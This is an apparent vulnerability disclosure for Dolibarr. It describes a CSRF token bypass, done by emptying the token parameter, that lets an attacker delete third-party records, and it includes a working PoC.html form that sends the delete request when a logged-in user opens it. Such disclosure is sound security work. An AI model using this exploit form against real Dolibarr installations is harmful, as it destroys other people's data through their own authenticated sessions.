✍️ Description

Attacker can delete any Third Parties for any user with CSRF vulnerability when the Admin or SuperAdmin or an authorized user click on PoC.html file, it is enough to attacker know the Third Parties id on server.

I convert the

GET /societe/card.php?socid=2711&action=confirm_delete&confirm=yes&token=74ab7523a2fd5018a5cccdfc8ad74625 HTTP/2

to this

GET /societe/card.php?socid=2711&action=confirm_delete&token=&confirm=yes HTTP/2

and then the CSRF token baypassed.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/societe/card.php">
      <input type="hidden" name="socid" value="2712" />
      <input type="hidden" name="action" value="confirm&#95;delete" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of Delete Third Parties.